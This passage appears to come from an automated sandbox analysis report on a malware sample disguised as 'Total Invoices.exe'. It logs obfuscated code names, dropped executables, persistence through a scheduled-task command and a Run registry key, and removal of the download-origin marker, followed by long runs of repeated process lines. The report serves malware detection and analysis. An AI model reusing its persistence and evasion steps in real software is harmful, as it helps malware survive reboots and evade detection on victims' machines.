                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, iVR7yJzOnBXclf4yqE.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aa5a1URC9g', 'VcuakA9KiD', 'qBWaQs53Wf', 'SPra9cavTQ', 'TD4aNNjL1E', 'AWcaaSdAi7', 'jlgaRmemiy'
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, rKLqexOag3LmFqHckP.csHigh entropy of concatenated method names: 'ybgNEN8MS5', 'MKlNlNZSCS', 'WbNNIsdf5u', 'tWRNqDhfno', 'pwGNpEyikQ', 'Qv1NjrKZKi', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Total Invoices.exeFile created: C:\Users\user\AppData\Roaming\dWXyZYb.exeJump to dropped file

                      Boot Survival

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GUIVTmeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GUIVTmeJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe:Zone.Identifier read attributes | delete
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
